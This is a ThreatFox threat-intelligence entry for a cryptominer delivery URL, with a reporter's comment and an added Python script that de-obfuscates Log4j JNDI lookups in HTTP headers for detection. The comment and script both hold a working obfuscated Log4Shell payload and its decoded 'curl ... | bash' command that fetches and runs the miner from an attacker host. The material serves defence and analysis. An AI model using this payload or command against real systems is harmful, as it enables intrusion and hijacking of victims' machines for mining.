ThreatFox IOC Database

You are viewing the ThreatFox database entry for url http://31.57.109.131/scripts/4thepool_miner.sh.

Database Entry

IOC ID: 1820020
IOC: http://31.57.109.131/scripts/4thepool_miner.sh
IOC Type: url
Threat Type: payload_delivery
Malware: Unknown malware
Confidence Level: moderate (50%)
Is compromised?: False
ASN: AS58212 DATAFOREST
Country: DE
First seen: 2026-05-30 15:14:01 UTC
Last seen: never
UUID: afd37803-5bfd-11f1-b930-42010aa4000a
Reporter: Anonymous
Reward: 5 credits from ThreatFox
Tags: CryptoMiner, sh, miner, ubuntu

Anonymous
It appears that a Chinese actor is attempting to pass this malformed request in the headers as the referer “t(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//148.113.233.202:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMzEuNTcuMTA5LjEzMS9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}’)”. The shell execution is encoded in base64 and contains the following command: “export HOME=/tmp; curl -s -L http://31.57.109.131/scripts/4thepool_miner.sh | bash -s”.
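The referer quoted in the report hides a Log4j JNDI lookup behind the lookup default operator (`${env:NaN:-j}` evaluates to the literal `j` when no environment variable named `NaN` exists), and the LDAP path carries the shell command base64-encoded. The following is an added example, not ThreatFox code or the reporter's: it collapses that obfuscation the way Log4j 2 would, pulls out the JNDI URL, and decodes the embedded command. It goes slightly beyond the quoted sample by also handling the `lower:`/`upper:` case-mangling lookups. The sample header value is constructed from the payload quoted above (with straight quotes); treating the `/.../Base64/<payload>` path segment as the command carrier is an assumption about the JNDIExploit-style tooling, which the report itself does not describe.

```python
"""Collapse Log4j-lookup obfuscation in a header value and recover the JNDI command.

Added example, not ThreatFox code. SAMPLE_REFERER is constructed from the referer
quoted in the report. Decoding '/.../Base64/<b64>' as the command path is an
assumption about JNDIExploit-style servers, not something the report states.
"""
import base64
import re
from urllib.parse import urlsplit

# Constructed sample header value, modelled on the referer quoted in the report.
SAMPLE_REFERER = (
    "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}"
    "//148.113.233.202:3306/TomcatBypass/Command/Base64/"
    "ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMzEuNTcuMTA5LjEzMS9zY3Jp"
    "cHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')"
)

# An innermost lookup: "${...}" whose body contains no further "${" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:([^}]+)\}", re.IGNORECASE)


def _resolve(match):
    """Resolve one non-JNDI lookup the way the attacker expects Log4j 2 to.

    '${prefix:key:-default}' falls back to 'default' when the key is unset; that is
    the trick used here (assumption: no env var named 'NaN' exists). 'lower:' and
    'upper:' are handled as the other common case-mangling lookups. The jndi lookup
    itself is preserved so it can be extracted afterwards.
    """
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":
        return arg.lower()
    if sep and prefix.lower() == "upper":
        return arg.upper()
    return match.group(0)  # unknown lookup: leave it literal rather than guess


def deobfuscate(text, max_rounds=64):
    """Repeatedly collapse innermost lookups until only ${jndi:...} (if any) remains."""
    for _ in range(max_rounds):
        collapsed = INNERMOST.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def extract_jndi_urls(text):
    """Return the JNDI URLs hidden in a header value, after de-obfuscation."""
    return JNDI.findall(deobfuscate(text))


def decode_jndiexploit_command(jndi_url):
    """Decode a '/.../Base64/<payload>' path (JNDIExploit-style layout) to a command.

    Returns None when the path does not follow that layout.
    """
    parts = urlsplit(jndi_url).path.strip("/").split("/")
    if len(parts) >= 2 and parts[-2].lower() == "base64":
        return base64.b64decode(parts[-1]).decode("utf-8", "replace")
    return None


def analyse_header(value):
    """Summarise a suspicious header: callback host:port and recovered command."""
    findings = []
    for url in extract_jndi_urls(value):
        findings.append({
            "jndi_url": url,
            "callback": urlsplit(url).netloc,
            "command": decode_jndiexploit_command(url),
        })
    return findings


if __name__ == "__main__":
    for finding in analyse_header(SAMPLE_REFERER):
        print(f"callback : {finding['callback']}")
        print(f"command  : {finding['command']}")
```

Because the resolver works innermost-first and only ever substitutes the default branch, it does not need to know what `NaN`, `:` or any other key would have resolved to on the victim; a detection rule built on the raw header would have to enumerate every spelling, whereas normalising first lets a single `${jndi:` match catch them. Run it against access logs or WAF captures by feeding each header value to `analyse_header`.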